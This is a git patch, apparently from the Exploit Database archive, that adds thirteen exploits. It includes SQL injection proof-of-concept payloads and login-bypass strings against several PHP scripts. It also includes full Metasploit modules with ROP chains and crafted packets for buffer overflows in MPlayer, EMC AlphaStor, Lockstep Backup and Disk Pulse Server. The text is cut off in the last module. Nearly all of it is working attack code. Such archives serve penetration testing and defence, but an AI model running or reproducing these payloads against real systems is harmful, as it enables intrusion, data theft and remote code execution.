From 6e81f8d63501c085ded5c979bd80cdfec7bdd56d Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 15 Sep 2017 05:01:22 +0000 Subject: [PATCH] DB: 2017-09-15 13 new exploits MPlayer - '.SAMI' Subtitle File Buffer Overflow (DEP Bypass) (Metasploit) Trend Micro Control Manager - ImportFile Directory Traversal RCE (Metasploit) Trend Micro Control Manager - ImportFile Directory Traversal Remote Code Execution (Metasploit) EMC AlphaStor Library Manager < 4.0 build 910 - Opcode 0x4f Buffer Overflow (Metasploit) EMC AlphaStor Device Manager - Opcode 0x72 Buffer Overflow (Metasploit) Lockstep Backup for Workgroups 4.0.3 - Buffer Overflow (Metasploit) Disk Pulse Server 2.2.34 - GetServerInfo Buffer Overflow (Metasploit) haneWIN DNS Server 1.5.3 - Buffer Overflow (Metasploit) KingScada AlarmServer 3.1.2.13 - Stack Buffer Overflow (Metasploit) Cloudview NMS 2.00b - Writable Directory Traversal Execution (Metasploit) Enterprise Edition Payment Processor Script 3.7 - SQL Injection Adserver Script 5.6 - SQL Injection PTC KSV1 Script 1.7 - 'type' Parameter SQL Injection Theater Management Script - SQL Injection Justdial Clone Script - 'fid' Parameter SQL Injection --- files.csv | 15 +++- platforms/php/webapps/42591.txt | 4 +- platforms/php/webapps/42713.txt | 34 ++++++++ platforms/php/webapps/42714.txt | 27 ++++++ platforms/php/webapps/42715.txt | 27 ++++++ platforms/php/webapps/42716.txt | 31 +++++++ platforms/php/webapps/42717.txt | 27 ++++++ platforms/windows/local/42718.rb | 134 ++++++++++++++++++++++++++++++ platforms/windows/remote/42719.rb | 124 +++++++++++++++++++++++++++ platforms/windows/remote/42720.rb | 112 +++++++++++++++++++++++++ platforms/windows/remote/42721.rb | 88 ++++++++++++++++++++ platforms/windows/remote/42722.rb | 105 +++++++++++++++++++++++ platforms/windows/remote/42723.rb | 74 +++++++++++++++++ platforms/windows/remote/42724.rb | 78 +++++++++++++++++ platforms/windows/remote/42725.rb | 88 ++++++++++++++++++++ 15 files changed, 965 insertions(+), 3 deletions(-) create mode 100755 platforms/php/webapps/42713.txt create mode 100755 platforms/php/webapps/42714.txt create mode 100755 platforms/php/webapps/42715.txt create mode 100755 platforms/php/webapps/42716.txt create mode 100755 platforms/php/webapps/42717.txt create mode 100755 platforms/windows/local/42718.rb create mode 100755 platforms/windows/remote/42719.rb create mode 100755 platforms/windows/remote/42720.rb create mode 100755 platforms/windows/remote/42721.rb create mode 100755 platforms/windows/remote/42722.rb create mode 100755 platforms/windows/remote/42723.rb create mode 100755 platforms/windows/remote/42724.rb create mode 100755 platforms/windows/remote/42725.rb diff --git a/files.csv b/files.csv index fedb755d9..0a93e9c2b 100644 --- a/files.csv +++ b/files.csv @@ -9235,6 +9235,7 @@ id,file,description,date,author,platform,type,port 42625,platforms/windows/local/42625.py,"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Out-of-Bounds Write Privilege Escalation",2017-09-06,mr_me,windows,local,0 42626,platforms/linux/local/42626.c,"Tor (Linux) - X11 Linux Sandbox Breakout",2017-09-06,"Google Security Research",linux,local,0 42665,platforms/windows/local/42665.py,"Jungo DriverWizard WinDriver <= 12.4.0 - Kernel Pool Overflow",2017-09-12,mr_me,windows,local,0 +42718,platforms/windows/local/42718.rb,"MPlayer - '.SAMI' Subtitle File Buffer Overflow (DEP Bypass) (Metasploit)",2011-06-14,"James Fitts",windows,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -15804,7 +15805,7 @@ id,file,description,date,author,platform,type,port 42650,platforms/python/remote/42650.rb,"Docker Daemon - Unprotected TCP Socket (Metasploit)",2017-09-11,Metasploit,python,remote,2375 42683,platforms/windows/remote/42683.txt,"Mako Web Server 2.5 - Multiple Vulnerabilities",2017-09-13,hyp3rlinx,windows,remote,0 42691,platforms/windows/remote/42691.rb,"ZScada Modbus Buffer 2.0 - Stack-Based Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,0 -42692,platforms/php/remote/42692.rb,"Trend Micro Control Manager - ImportFile Directory Traversal RCE (Metasploit)",2017-09-13,"James Fitts",php,remote,0 +42692,platforms/php/remote/42692.rb,"Trend Micro Control Manager - ImportFile Directory Traversal Remote Code Execution (Metasploit)",2017-09-13,"James Fitts",php,remote,0 42693,platforms/windows/remote/42693.rb,"Viap Automation WinPLC7 5.0.45.5921 - Recv Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,0 42694,platforms/windows/remote/42694.rb,"Sielco Sistemi Winlog 2.07.16 - Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,46824 42695,platforms/linux/remote/42695.rb,"Alienvault Open Source SIEM (OSSIM) < 4.8.0 - 'get_file' Information Disclosure (Metasploit)",2014-06-13,"James Fitts",linux,remote,0 @@ -15819,6 +15820,13 @@ id,file,description,date,author,platform,type,port 42708,platforms/linux/remote/42708.rb,"Alienvault OSSIM av-centerd Util.pm sync_rserver - Command Execution (Metasploit)",2017-09-13,"James Fitts",linux,remote,40007 42709,platforms/linux/remote/42709.rb,"Alienvault OSSIM av-centerd 4.7.0 - 'get_log_line' Command Injection (Metasploit)",2017-09-13,"James Fitts",linux,remote,40007 42711,platforms/windows/remote/42711.txt,"Microsoft Windows .NET Framework - Remote Code Execution",2017-09-13,Voulnet,windows,remote,0 +42719,platforms/windows/remote/42719.rb,"EMC AlphaStor Library Manager < 4.0 build 910 - Opcode 0x4f Buffer Overflow (Metasploit)",2017-09-14,"James Fitts",windows,remote,3500 +42720,platforms/windows/remote/42720.rb,"EMC AlphaStor Device Manager - Opcode 0x72 Buffer Overflow (Metasploit)",2017-09-14,"James Fitts",windows,remote,3000 +42721,platforms/windows/remote/42721.rb,"Lockstep Backup for Workgroups 4.0.3 - Buffer Overflow (Metasploit)",2017-09-14,"James Fitts",windows,remote,2125 +42722,platforms/windows/remote/42722.rb,"Disk Pulse Server 2.2.34 - GetServerInfo Buffer Overflow (Metasploit)",2010-10-19,"James Fitts",windows,remote,0 +42723,platforms/windows/remote/42723.rb,"haneWIN DNS Server 1.5.3 - Buffer Overflow (Metasploit)",2017-09-14,"James Fitts",windows,remote,53 +42724,platforms/windows/remote/42724.rb,"KingScada AlarmServer 3.1.2.13 - Stack Buffer Overflow (Metasploit)",2017-09-14,"James Fitts",windows,remote,12401 +42725,platforms/windows/remote/42725.rb,"Cloudview NMS 2.00b - Writable Directory Traversal Execution (Metasploit)",2017-09-14,"James Fitts",windows,remote,69 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -38492,3 +38500,8 @@ id,file,description,date,author,platform,type,port 42705,platforms/windows/webapps/42705.rb,"Carlo Gavazzi Powersoft 2.1.1.1 - Directory Traversal File Disclosure (Metasploit)",2017-09-13,"James Fitts",windows,webapps,0 42706,platforms/windows/webapps/42706.rb,"Carel PlantVisor 2.4.4 - Directory Traversal Information Disclosure (Metasploit)",2017-09-13,"James Fitts",windows,webapps,0 42707,platforms/windows/webapps/42707.txt,"Carel PlantVisor 2.4.4 - Directory Traversal",2011-09-13,"Luigi Auriemma",windows,webapps,0 +42713,platforms/php/webapps/42713.txt,"Enterprise Edition Payment Processor Script 3.7 - SQL Injection",2017-09-14,"Ihsan Sencan",php,webapps,0 +42714,platforms/php/webapps/42714.txt,"Adserver Script 5.6 - SQL Injection",2017-09-14,"Ihsan Sencan",php,webapps,0 +42715,platforms/php/webapps/42715.txt,"PTC KSV1 Script 1.7 - 'type' Parameter SQL Injection",2017-09-14,"Ihsan Sencan",php,webapps,0 +42716,platforms/php/webapps/42716.txt,"Theater Management Script - SQL Injection",2017-09-14,"Ihsan Sencan",php,webapps,0 +42717,platforms/php/webapps/42717.txt,"Justdial Clone Script - 'fid' Parameter SQL Injection",2017-09-14,"Ihsan Sencan",php,webapps,0 diff --git a/platforms/php/webapps/42591.txt b/platforms/php/webapps/42591.txt index f15b94d6b..efff6f0b2 100755 --- a/platforms/php/webapps/42591.txt +++ b/platforms/php/webapps/42591.txt @@ -63,8 +63,8 @@ and user role of the admin in the comment section Reference: ========= -Video POC : -https://drive.google.com/file/d/0B6715xUqH18MS1J5Sk13emFkQmc/view?usp=sharing +1. https://www.youtube.com/watch?v=8GZg1IuSfCs +2. https://www.techipick.com/exploiting-router-authentication-through-web-interface Disclosure Timeline: ====================================== diff --git a/platforms/php/webapps/42713.txt b/platforms/php/webapps/42713.txt new file mode 100755 index 000000000..d8a91e133 --- /dev/null +++ b/platforms/php/webapps/42713.txt @@ -0,0 +1,34 @@ +# # # # # +# Exploit Title: Enterprise Edition Payment Processor Script 3.7 - SQL Injection +# Dork: N/A +# Date: 14.09.2017 +# Vendor Homepage: https://www.goterhosting.com/ +# Software Link: https://www.goterhosting.com/payment-processor-script.php +# Demo: http://www.enterprise-edition.gvmhosting.com/ +# Version: 3.7 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# +# http://localhost/[PATH]/login +# +# User: 'or 1=1 or ''=' Pass: 'or 1=1 or ''=' +# +# http://localhost/[PATH]/products?id=[SQL]&action=update +# +# -1++/*!00002UNION*/(/*!00002SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,/*!00002CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION()))--+-&action=update +# +# http://localhost/[PATH]/bank?id=[SQL]&action=update +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42714.txt b/platforms/php/webapps/42714.txt new file mode 100755 index 000000000..12f326802 --- /dev/null +++ b/platforms/php/webapps/42714.txt @@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: Adserver Script 5.6 - SQL Injection +# Dork: N/A +# Date: 14.09.2017 +# Vendor Homepage: https://www.goterhosting.com/ +# Software Link: https://www.goterhosting.com/adserverscript.php +# Demo: http://adserverscript.gvmhosting.com/ +# Version: 5.6 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an advertiser to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/manage-target.php?id=[SQL]&wap=0 +# +# 13-13'+/*!00008union*/+/*!00008select*/++/*!00008CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION())--+-&wap=0 +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42715.txt b/platforms/php/webapps/42715.txt new file mode 100755 index 000000000..e293517b1 --- /dev/null +++ b/platforms/php/webapps/42715.txt @@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: PTC KSV1 Script 1.7 - SQL Injection +# Dork: N/A +# Date: 14.09.2017 +# Vendor Homepage: https://www.goterhosting.com/ +# Software Link: https://www.goterhosting.com/ptc-ksv1.php +# Demo: http://www.ksv1demo.gvmhosting.com/ +# Version: 1.7 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/gpt.php?v=entry&type=[SQL]&id=1& +# +# +'++aND(/*!00000sELeCT*/+0x30783331+/*!00000FrOM*/+(/*!00000SeLeCT*/+cOUNT(*),/*!00000CoNCaT*/((sELEcT(sELECT+/*!00000CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a) AND ''='&id=1& +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42716.txt b/platforms/php/webapps/42716.txt new file mode 100755 index 000000000..cbfefc0ed --- /dev/null +++ b/platforms/php/webapps/42716.txt @@ -0,0 +1,31 @@ +# # # # # +# Exploit Title: Theater Management Script - SQL Injection +# Dork: N/A +# Date: 14.09.2017 +# Vendor Homepage: http://www.phpscriptsmall.com/ +# Software Link: http://www.exclusivescript.com/product/8o2b4417538/php-scripts/theater-management-script +# Demo: http://198.38.86.159/~dineshkumarwork/demo/movie/ +# Version: N/A +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/show-time.php?moid=[SQL] +# +# -100'++/*!08888UNION*/(/*!08888SELECT*/0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329)--+- +# +# http://localhost/[PATH]/event-detail.php?eid=[SQL] +# +# http://localhost/[PATH]/trailer-detail.php?moid=[SQL] +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42717.txt b/platforms/php/webapps/42717.txt new file mode 100755 index 000000000..1d8076d6b --- /dev/null +++ b/platforms/php/webapps/42717.txt @@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: Justdial Clone Script - SQL Injection +# Dork: N/A +# Date: 14.09.2017 +# Vendor Homepage: http://www.phpscriptsmall.com/ +# Software Link: http://www.exclusivescript.com/product/z1mt4303451/php-scripts/justdial-clone-script +# Demo: http://74.124.215.220/~jusdil/ +# Version: N/A +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/restaurants-details.php?fid=[SQL] +# +# 46'++aND(/*!00000sELeCT*/+0x30783331+/*!00000FrOM*/+(/*!00000SeLeCT*/+cOUNT(*),/*!00000CoNCaT*/((sELEcT(sELECT+/*!00000CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a) AND ''=' +# +# Etc.. +# # # # # diff --git a/platforms/windows/local/42718.rb b/platforms/windows/local/42718.rb new file mode 100755 index 000000000..1bef85ffa --- /dev/null +++ b/platforms/windows/local/42718.rb @@ -0,0 +1,134 @@ +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::FILEFORMAT + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Mplayer SAMI Buffer Overflow', + 'Description' => %q{ + This module exploits a stack based buffer overflow found in + SMPlayer 0.6.9 (Permanent DEP /AlwaysON). The overflow is + triggered during the parsing of an overly long string found + in a malicious SAMI subtitle file. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'James Fitts' ], + 'Version' => '$Revision: $', + 'References' => + [ + [ 'BID', '49149' ], + [ 'OSVDB', '74604' ], + [ 'URL', 'http://www.saintcorporation.com/cgi-bin/exploit_info/mplayer_sami_subtitle_file_overflow' ], + [ 'URL', 'http://labs.mwrinfosecurity.com/assets/149/mwri_mplayer-sami-subtitles_2011-08-12.pdf' ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + 'DisablePayloadHandler' => 'true', + }, + 'Payload' => + { + 'Space' => 700, + 'BadChars' => "\x00\x0a\x0d\x3c\x7b", + 'StackAdjustment' => -3500, + 'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff", + 'DisableNops' => 'True', + 'EncoderOptions' => + { + 'BufferRegister' => 'ECX', + }, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows XP SP3 EN', + { + # pushad/ retn + # msvcrt.dll + 'Ret' => 0x77c12df9, + } + ], + ], + 'Privileged' => false, + 'DisclosureDate' => 'Jun 14 2011', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [ true, 'The file name.', 'msfmsfa.smi']), + ], self.class) + end + + def make_nops(cnt) + return "\x41" * cnt + end + + def exploit + + # Chain 2 => kernel32!virtualalloc + # msvcrt.dll + gadgets = [ + 0x77c23e7a, # XOR EAX, EAX/ RETN + 0x77c13ffd, # XCHG EAX, ECX/ RETN + 0x77c2c84b, # MOV EBX, ECX/ MOV ECX, EAX/ MOV EAX, ESI/ POP ESI/ RETN 10 + 0x41414141, + 0x77c127e5, # INC EBX/ RETN + 0x41414141, + 0x41414141, + 0x41414141, + 0x41414141, + 0x77c3b860, # POP EAX/ RETN + 0x41414141, + 0x77c2d998, # POP ECX/ RETN + 0x41413141, + 0x77c47918, # SUB EAX, ECX/ RETN + 0x77c58fbc, # XCHG EAX, EDX/ RETN + 0x77c3b860, # POP EAX/ RETN + 0x41414141, + 0x77c2d998, # POP ECX/ RETN + 0x41414101, + 0x77c47918, # SUB EAX, ECX/ RETN + 0x77c13ffd, # XCHG EAX, ECX/ RETN + 0x77c53f3a, # POP EBP/ RETN + 0x77c53f3a, # POP EBP/ RETN + 0x77c39dd3, # POP EDI/ POP ESI/ RETN + 0x77c39dd5, # ROP NOP + 0x77c168cd, # JMP EAX + 0x77c21d16, # POP EAX/ RETN + 0x7c809af1, # kernel32!virtualalloc + 0x77c12df9, # PUSHAD/ RETN + 0x77c35524, # PUSH ESP/ RETN + ].flatten.pack("V*") + + p = make_nops(16) + payload.encoded + + boom = pattern_create(979) + boom << [target.ret].pack('V') + boom[83, gadgets.length] = gadgets + boom[203, p.length] = p + + # Chain 1 => Stack Pivot + boom[963, 4] = [0x41414101].pack('V') # Size + boom[967, 4] = [0x77c58fbc].pack('V') # XCHG EAX, EDX/ RETN => exec 2 + boom[971, 4] = [0x77c59f6b].pack('V') # ADD DH, BL/ RETN => exec 1 + boom[975, 4] = [0x77c15ed5].pack('V') # XCHG EAX, ESP/ RETN => exec 3 + + + smi = %Q| + + + #{rand_text_alpha_upper(40)} + #{boom} +| + + print_status("Creating '#{datastore['FILENAME']}' file ...") + + file_create(smi) + + end + +end +__END__ diff --git a/platforms/windows/remote/42719.rb b/platforms/windows/remote/42719.rb new file mode 100755 index 000000000..e34599b1a --- /dev/null +++ b/platforms/windows/remote/42719.rb @@ -0,0 +1,124 @@ +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'EMC AlphaStor Library Manager Opcode 0x4f', + 'Description' => %q{ + This module exploits a stack based buffer overflow found in EMC + Alphastor Library Manager version < 4.0 build 910. The overflow + is triggered due to a lack of sanitization of the pointers used + for two strcpy functions. + }, + 'Author' => [ 'james fitts' ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-14-029/' ], + [ 'CVE', '2013-0946' ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + 'wfsdelay' => 1000 + }, + 'Privileged' => true, + 'Payload' => + { + 'Space' => 160, + 'DisableNops' => 'true', + 'BadChars' => "\x00\x09\x0a\x0d", + 'StackAdjustment' => -404, + 'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff", + 'Compat' => + { + 'SymbolLookup' => 'ws2ord', + }, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ + 'Windows Server 2003 SP2 EN', + { + # msvcrt.dll + # add esp, 0c/ retn + 'Ret' => 0x77bdda70, + } + ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Feb 13 2014')) + + register_options( + [ + Opt::RPORT(3500) + ], self.class ) + end + + def exploit + connect + + p = "\x90" * 8 + p << payload.encoded + + # msvcrt.dll + # 96 bytes + rop = [ + 0x77bb2563, # pop eax/ retn + 0x77ba1114, # ptr to kernel32!virtualprotect + 0x77bbf244, # mov eax, dword ptr [eax]/ pop ebp/ retn + 0xfeedface, + 0x77bb0c86, # xchg eax, esi/ retn + 0x77bc9801, # pop ebp/ retn + 0x77be2265, + 0x77bb2563, # pop eax/ retn + 0x03C0990F, + 0x77bdd441, # sub eax, 3c0940fh/ retn + 0x77bb48d3, # pop eax/ retn + 0x77bf21e0, + 0x77bbf102, # xchg eax, ebx/ add byte ptr [eax], al/ retn + 0x77bbfc02, # pop ecx/ retn + 0x77bef001, + 0x77bd8c04, # pop edi/ retn + 0x77bd8c05, + 0x77bb2563, # pop eax/ retn + 0x03c0984f, + 0x77bdd441, # sub eax, 3c0940fh/ retn + 0x77bb8285, # xchg eax, edx/ retn + 0x77bb2563, # pop eax/ retn + 0x90909090, + 0x77be6591, # pushad/ add al, 0efh/ retn + ].pack("V*") + + buf = Rex::Text.pattern_create(514) + buf[0, 2] = "O~" # opcode + buf[13, 4] = [0x77bdf444].pack('V') # stack pivot 52 + buf[25, 4] = [target.ret].pack('V') # stack pivot 12 + buf[41, 4] = [0x77bdf444].pack('V') # stack pivot 52 + buf[57, 4] = [0x01167e20].pack('V') # ptr + buf[69, rop.length] = rop + buf[165, 4] = [0x909073eb].pack('V') # jmp $+117 + buf[278, 4] = [0x0116fd59].pack('V') # ptr + buf[282, p.length] = p + buf[512, 1] = "\x00" + + # junk + buf << "AAAA" + buf << "BBBB" + buf << "CCCC" + buf << "DDDD" + + print_status("Trying target %s..." % target.name) + + sock.put(buf) + + handler + disconnect + end + +end diff --git a/platforms/windows/remote/42720.rb b/platforms/windows/remote/42720.rb new file mode 100755 index 000000000..ebcd3641f --- /dev/null +++ b/platforms/windows/remote/42720.rb @@ -0,0 +1,112 @@ +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'EMC AlphaStor Device Manager Opcode 0x72', + 'Description' => %q{ + This module exploits a stack based buffer overflow vulnerability + found in EMC Alphastor Device Manager. The overflow is triggered + when sending a specially crafted packet to the rrobotd.exe service + listening on port 3000. During the copying of strings to the stack + an unbounded sprintf() function overwrites the return pointer + leading to remote code execution. + }, + 'Author' => [ 'James Fitts' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision: $', + 'References' => + [ + [ 'URL', '0day' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + }, + 'Privileged' => true, + 'Payload' => + { + 'Space' => 160, + 'DisableNops' => 'true', + 'BadChars' => "\x00\x09\x0a\x0d", + 'StackAdjustment' => -404, + 'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff", + 'Compat' => + { + 'ConnectionType' => '+ws2ord', + } + }, + 'Platform' => 'win', + 'Targets' => + [ + [ + 'Windows Server 2003 SP2 EN', + { + # pop eax/ retn + # msvcrt.dll + 'Ret' => 0x77bc5d88, + } + ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Feb 14 2013')) + + register_options( + [ + Opt::RPORT(3000) + ], self.class ) + end + + def exploit + connect + + # msvcrt.dll + # 96 bytes + rop = [ + 0x77bb2563, # pop eax/ retn + 0x77ba1114, # ptr to kernel32!virtualprotect + 0x77bbf244, # mov eax, dword ptr [eax]/ pop ebp/ retn + 0xfeedface, + 0x77bb0c86, # xchg eax, esi/ retn + 0x77bc9801, # pop ebp/ retn + 0x77be2265, + 0x77bb2563, # pop eax/ retn + 0x03C0990F, + 0x77bdd441, # sub eax, 3c0940fh/ retn + 0x77bb48d3, # pop eax/ retn + 0x77bf21e0, + 0x77bbf102, # xchg eax, ebx/ add byte ptr [eax], al/ retn + 0x77bbfc02, # pop ecx/ retn + 0x77bef001, + 0x77bd8c04, # pop edi/ retn + 0x77bd8c05, + 0x77bb2563, # pop eax/ retn + 0x03c0984f, + 0x77bdd441, # sub eax, 3c0940fh/ retn + 0x77bb8285, # xchg eax, edx/ retn + 0x77bb2563, # pop eax/ retn + 0x90909090, + 0x77be6591, # pushad/ add al, 0efh/ retn + ].pack("V*") + + buf = "\xcc" * 550 + buf[246, 4] = [target.ret].pack('V') + buf[250, 4] = [0x77bf6f80].pack('V') + buf[254, rop.length] = rop + buf[350, payload.encoded.length] = payload.encoded + + packet = "\x72#{buf}" + + print_status("Trying target %s..." % target.name) + + sock.put(packet) + + handler + disconnect + end + +end diff --git a/platforms/windows/remote/42721.rb b/platforms/windows/remote/42721.rb new file mode 100755 index 000000000..806df9bbe --- /dev/null +++ b/platforms/windows/remote/42721.rb @@ -0,0 +1,88 @@ +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Lockstep Backup for Workgroups <= 4.0.3', + 'Description' => %q{ + This module exploits a stack buffer overflow found in + Lockstep Backup for Workgroups <= 4.0.3. The vulnerability + is triggered when sending a specially crafted packet that + will cause a login failure. + }, + 'Author' => [ 'james fitts' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision: $', + 'References' => + [ + [ 'URL', 'http://secunia.com/advisories/50260/' ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + }, + 'Privileged' => true, + 'Payload' => + { + 'Space' => 1000, + 'BadChars' => "\x00", + 'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff", + 'EncoderType' => Msf::Encoder::Type::AlphanumUpper, + 'EncoderOptions' => + { + 'BufferRegister' => 'ECX', + }, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ + 'Windows 2000 ALL EN', + { + # msvcrt.dll + # pop ecx/ pop ecx/ retn + 'Ret' => 0x780146c0, + } + ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Feb 11 2013')) + + register_options( + [ + Opt::RPORT(2125), + OptString.new('USERNAME', [ true, 'Username of victim', 'msf' ]) + ], self.class ) + end + + def exploit + connect + + uname = datastore['USERNAME'] + + p = "\x90" * 16 + p << payload.encoded + + packet = rand_text_alpha_upper(10000) + packet[0, 8] = "BFWCA\x01\x01\x00" + packet[8, uname.length] = "#{uname}\x00" + packet[73, p.length] = p + packet[7197, 4] = "\xeb\x06\x90\x90" # jmp $+8 + packet[7201, 4] = [target.ret].pack('V') + packet[7205, 8] = "\x90" * 8 + packet[7213, 2] = "\xff\xe7" # jmp edi + + print_status("Trying target %s..." % target.name) + + sock.put(packet) + + handler + disconnect + end + +end diff --git a/platforms/windows/remote/42722.rb b/platforms/windows/remote/42722.rb new file mode 100755 index 000000000..dabce3c41 --- /dev/null +++ b/platforms/windows/remote/42722.rb @@ -0,0 +1,105 @@ +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Disk Pulse Server \'GetServerInfo\' Buffer Overflow', + 'Description' => %q{ + This module exploits a buffer overflow vulnerability found + in libpal.dll of Disk Pulse Server v2.2.34. The overflow + is triggered when sending an overly long 'GetServerInfo' + request to the service listening on port 9120. + }, + 'Author' => [ 'James Fitts' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision: $', + 'References' => + [ + [ 'BID', '43919' ], + [ 'URL', 'http://www.saintcorporation.com/cgi-bin/exploit_info/disk_pulse_getserverinfo' ], + [ 'URL', 'http://www.coresecurity.com/content/disk-pulse-server-getserverinfo-request-buffer-overflow-exploit-10-5' ] + ], + 'Privileged' => true, + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + }, + 'Payload' => + { + 'Space' => 300, + 'BadChars' => "\x00\x0a\x0d\x20", + 'DisableNops' => 'True', + 'StackAdjustment' => -3500, + 'Compat' => + { + 'SymbolLookup' => 'ws2ord', + } + }, + 'Platform' => 'win', + 'Targets' => + [ + [ + 'Windows XP SP3 EN', + { + # p/p/r + # libspp.dll + 'Ret' => 0x1006f71f, + 'Offset' => 303 + } + ], + ], + 